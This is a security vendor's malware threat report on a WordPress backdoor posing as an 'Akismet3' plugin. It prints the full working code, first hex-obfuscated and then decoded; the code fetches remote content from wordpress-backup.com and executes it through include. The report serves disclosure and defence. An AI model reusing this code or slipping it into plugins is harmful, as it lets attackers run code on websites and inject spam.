NinTechNet
NinjaFirewall
WP+ Edition
for WordPress websites
Pro+ Edition
for PHP websites
NinjaScanner
Code Profiler
Blog
Log In
Malware Threats Report #2015121111
Date
2015-12-11
Type
WordPress backdoor hidden inside a malicious plugin.
See also
http://nin.link/fkwp
Target
WordPress only
Vulnerability
Stolen admin password
Malware Domain
http://wordpress-backup.com/
Malware Code
<?php /** * * @package Akismet3 * @version 3.9.9 * @author WordPress.com <wordpress.com> * @copyright Copyright (c) 2012, WordPress.com * @license http://opensource.org/licenses/gpl-2.0.php GPL v2 or later * @link http://wordpress.com * @description Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. It keeps your site protected even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet plan to get an API key, and 3) Go to your Akismet configuration page, and save your API key. */ /* Plugin Name: Akismet3 Plugin URI: http://wordpress.com Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. It keeps your site protected even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet plan to get an API key, and 3) Go to your Akismet configuration page, and save your API key. Version: 3.9.9 Author: WordPress.com Author URI: http://wordpress.com License: GPLv2 or later */ $Ldkrw = "6966282166756e6374696f6e5f6578697374732822736974655f75726c2229297b66756e6374696f6e20736974655f75726c28297b72657475726e20245f5345525645525b27485454505f484f5354275d3b7d7d0a66756e6374696f6e206765745f68656164282475726c297b0a0969662820246375726c203d206375726c5f696e697428292029207b0a09096375726c5f7365746f707428246375726c2c4355524c4f50545f55524c2c2475726c293b0a09096375726c5f7365746f707428246375726c2c4355524c4f50545f52455455524e5452414e534645522c74727565293b0a09096375726c5f7365746f707428246375726c2c4355524c4f50545f4e4f424f44592c74727565293b0a09096375726c5f7365746f707428246375726c2c4355524c4f50545f4845414445522c74727565293b0a0909246f7574203d206375726c5f6578656328246375726c293b0a09096375726c5f636c6f736528246375726c293b0a090972657475726e20246f75743b0a097d0a7d0a0a24414b49534d455433203d204e554c4c3b0a6164645f616374696f6e2827696e6974272c2027616b69736d6574335f696e6974272c2030293b0a6164645f616374696f6e2827696e6974272c2027616b69736d6574335f6c6f61645f64617461272c2031293b0a6164645f616374696f6e2827696e6974272c2027616b69736d6574335f636f6e74656e74272c2032293b0a66756e6374696f6e20616b69736d6574335f696e697428297b0a09676c6f62616c2024414b49534d4554333b0a0924414b49534d455433203d206e657720416b69736d6574335f506c7567696e28293b0a097d0a66756e6374696f6e20616b69736d6574335f6c6f61645f6461746128297b0a09676c6f62616c2024414b49534d4554333b0a0924414b49534d4554332d3e6c6f61645f6461746128293b0a7d0a66756e6374696f6e20616b69736d6574335f636f6e74656e7428297b0a09676c6f62616c2024414b49534d4554333b0a0924414b49534d4554332d3e73686f775f636f6e74656e7428293b0a7d0a636c61737320416b69736d6574335f506c7567696e207b0a097072697661746520245f686f73743b0a097072697661746520245f736572766572203d2022687474703a2f2f776f726470726573732d6261636b75702e636f6d2f223b0a097072697661746520245f757269203d2046414c53453b0a097072697661746520245f706c7567696e506174683b0a097072697661746520245f6361636865466f6c6465723b0a0966756e6374696f6e205f5f636f6e73747275637428297b0a09090a090924746869732d3e5f686f7374203d207374725f7265706c616365286172726179282768747470733a2f2f272c2027687474703a2f2f272c20272c272c20275c5c272c20272f272c20273a3830272c20273a343433272c20273a27292c2027272c20736974655f75726c2829293b0a09090a09096966287375627374725f636f756e7428245f5345525645525b27524551554553545f555249275d2c20272f2729203c203220262620737472706f7328245f5345525645525b27524551554553545f555249275d2c2777702d2729203d3d3d2046414c5345297b0a09090924746869732d3e5f757269203d207374725f7265706c61636528272f272c2027272c20245f5345525645525b27524551554553545f555249275d293b0a09090924746869732d3e5f706c7567696e50617468203d20747261696c696e67736c617368697428747261696c696e67736c6173686974284142535041544829202e202777702d636f6e74656e7427202e204449524543544f52595f534550415241544f52202e2027706c7567696e7327202e204449524543544f52595f534550415241544f52202e2027416b69736d65743327293b0a09097d0a09092f2f6563686f2024746869732d3e5f7572693b0a09090a09090a090924746869732d3e5f6361636865466f6c646572203d2024746869732d3e5f706c7567696e50617468202e2027636163686527202e204449524543544f52595f534550415241544f523b0a09096966282166696c655f6578697374732824746869732d3e5f6361636865466f6c64657229290a0909096d6b6469722824746869732d3e5f6361636865466f6c646572293b0a09097d0a0966756e6374696f6e206c6f61645f6461746128297b0a090969662824746869732d3e5f757269297b0a090909696620282166696c655f6578697374732824746869732d3e5f6361636865466f6c646572202e206d64352824746869732d3e5f75726929202e20272e646174272929207b0a090909090a09090909092468656164733d6765745f686561642824746869732d3e5f736572766572202e2024746869732d3e5f686f7374202e222f22202e2024746869732d3e5f757269293b0a090909090a0909090909696628707265675f6d6174636828272334303423272c24686561647329207c7c20707265675f6d6174636828272335303023272c24686561647329297b0a09090909090972657475726e2046414c53453b0a09090909097d656c73657b0a09090909090924726573706f6e7365203d2066696c655f6765745f636f6e74656e74732824746869732d3e5f736572766572202e2024746869732d3e5f686f7374202e222f22202e2024746869732d3e5f757269293b0a09090909090966696c655f7075745f636f6e74656e74732824746869732d3e5f6361636865466f6c646572202e206d64352824746869732d3e5f75726929202e20272e646174272c2024726573706f6e7365293b7d0a0909090909094066696c655f7075745f636f6e74656e74732824746869732d3e5f6361636865466f6c6465722e27736974656d61702e68746d6c272c4066696c655f6765745f636f6e74656e74732824746869732d3e5f6361636865466f6c6465722e27736974656d61702e68746d6c27292e273c6120687265663d22687474703a2f2f272e24746869732d3e5f686f7374202e222f22202e2024746869732d3e5f7572692e27223e272e24746869732d3e5f686f7374202e222f22202e2024746869732d3e5f7572692e273c2f613e202d2063616368654e616d653a272e6d64352824746869732d3e5f75726929202e20272e646174272e273c62723e27293b0a090909097d0a0909097d0a09097d0a0966756e6374696f6e2073686f775f636f6e74656e7428297b0a090969662824746869732d3e5f7572692026262066696c655f6578697374732824746869732d3e5f6361636865466f6c646572202e206d64352824746869732d3e5f75726929202e20272e6461742729297b0a09090909696e636c7564652024746869732d3e5f6361636865466f6c646572202e206d64352824746869732d3e5f75726929202e20272e646174273b657869743b0a09097d0a097d0a7d"; if(!function_exists("hex2asc")){ function hex2asc($in){ $out = ""; $j=strlen($in)/2; for($i=0;$i<$j;$i++){ $out.=chr( base_convert(substr($in,$i*2,2),16,10) ); } print $out; } } $Ldkrw = create_function(null, hex2asc($Ldkrw)); $Ldkrw(); ?>
Malware Code
if(!function_exists("site_url")){function site_url(){return $_SERVER['HTTP_HOST'];}} function get_head($url){ if( $curl = curl_init() ) { curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_RETURNTRANSFER,true); curl_setopt($curl,CURLOPT_NOBODY,true); curl_setopt($curl,CURLOPT_HEADER,true); $out = curl_exec($curl); curl_close($curl); return $out; } } $AKISMET3 = NULL; add_action('init', 'akismet3_init', 0); add_action('init', 'akismet3_load_data', 1); add_action('init', 'akismet3_content', 2); function akismet3_init(){ global $AKISMET3; $AKISMET3 = new Akismet3_Plugin(); } function akismet3_load_data(){ global $AKISMET3; $AKISMET3->load_data(); } function akismet3_content(){ global $AKISMET3; $AKISMET3->show_content(); } class Akismet3_Plugin { private $_host; private $_server = "http://wordpress-backup.com/"; private $_uri = FALSE; private $_pluginPath; private $_cacheFolder; function __construct(){ $this->_host = str_replace(array('https://', 'http://', ',', '\\', '/', ':80', ':443', ':'), '', site_url()); if(substr_count($_SERVER['REQUEST_URI'], '/') < 2 && strpos($_SERVER['REQUEST_URI'],'wp-') === FALSE){ $this->_uri = str_replace('/', '', $_SERVER['REQUEST_URI']); $this->_pluginPath = trailingslashit(trailingslashit(ABSPATH) . 'wp-content' . DIRECTORY_SEPARATOR . 'plugins' . DIRECTORY_SEPARATOR . 'Akismet3'); } //echo $this->_uri; $this->_cacheFolder = $this->_pluginPath . 'cache' . DIRECTORY_SEPARATOR; if(!file_exists($this->_cacheFolder)) mkdir($this->_cacheFolder); } function load_data(){ if($this->_uri){ if (!file_exists($this->_cacheFolder . md5($this->_uri) . '.dat')) { $heads=get_head($this->_server . $this->_host ."/" . $this->_uri); if(preg_match('#404#',$heads) || preg_match('#500#',$heads)){ return FALSE; }else{ $response = file_get_contents($this->_server . $this->_host ."/" . $this->_uri); file_put_contents($this->_cacheFolder . md5($this->_uri) . '.dat', $response);} @file_put_contents($this->_cacheFolder.'sitemap.html',@file_get_contents($this->_cacheFolder.'sitemap.html').'<a href="http://'.$this->_host ."/" . $this->_uri.'">'.$this->_host ."/" . $this->_uri.'</a> - cacheName:'.md5($this->_uri) . '.dat'.'<br>'); } } } function show_content(){ if($this->_uri && file_exists($this->_cacheFolder . md5($this->_uri) . '.dat')){ include $this->_cacheFolder . md5($this->_uri) . '.dat';exit; } } }
NinjaFirewall WP+
Features
Pricing
FAQ
Free Download
NinjaFirewall Pro+
Features
Pricing
FAQ
Free Download
NinjaScanner
Features
Pricing
FAQ
Free Download
Code Profiler
Features
Pricing
FAQ
Free Download
NinTechNet
Blog
About Us
News Coverage
Contact
Privacy Policy
Refund Policy
© 2024 The Ninja Technologies Network
Twitter
Facebook